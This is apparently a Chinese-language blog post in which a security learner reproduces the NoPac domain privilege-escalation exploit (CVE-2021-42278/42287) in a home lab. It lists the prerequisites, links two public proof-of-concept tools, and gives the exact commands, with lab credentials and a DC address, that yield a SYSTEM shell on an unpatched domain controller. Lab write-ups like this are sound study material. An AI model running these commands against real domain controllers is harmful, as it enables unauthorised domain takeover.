NoPac (CVE-2021-42278 域提權)

 NoPac (CVE-2021-42278 域提權)





前言 :

中秋節快樂,筆者是個肥仔(X,烤肉好香,連假回不去老家,就來寫個文章關於 NoPac (域提權) 漏洞,CVE 編號為 CVE-2021-42278、CVE-2021-42287,以後打內網又多了一招,有時候會覺得在什麼都碰的情況下,到後面還是要專注於某個領域成長會比較好,不過自己也還在摸索當中 xD

內文 : 

其實原本是想玩 Tryhackme,畢竟自己內網 AD 滲透還不太熟悉,偶然間查到 NoPac(域提權) 漏洞,於是就花了點時間實作,還滿好玩的。

實作環境 :

kali : 192.168.109.136

Windows DC : 192.168.109.132

需求 :

1  普通域成員帳戶

2. 域用戶有創建機器用戶的權限(一般默認權限)

3. DC 未打補丁 KB5008380 / KB5008602

PoC1 : 

https://github.com/WazeHell/sam-the-admin (目前只能在 kali 使用)

安裝環境 :

pip3 install -r requirements.txt

首先 sam_the_admin.py 修改路徑( impacket 中的 smbexec.py、scriptsdump.py)。

執行。

python3 sam_the_admin.py "tdslab.local/noth:1qaz@WSX" -dc-ip 192.168.109.132 -shell 

成功獲取 system 權限。

PoC2 :  

https://github.com/Ridter/noPac

安裝環境 :

pip3 install -r requirements.txt

執行。

python3 noPac.py -use-ldap tdslab.local/noth:1qaz@WSX -dc-ip 192.168.109.132 -shell

成功獲取 system 權限

只要獲得普通域帳戶就可以提權,也就是說 Minikatz dump 出明文密碼只要 DC 存在此漏洞就輕輕鬆鬆提權,不過也多是學到一招了,畢竟自己還菜,近期目標應該就是多打橫向以及 AD,順便學學域維持權限,不過在實戰中又會遇到很多麻煩的防毒和狀況,把自己不足的地方補足就好。

留言

熱門文章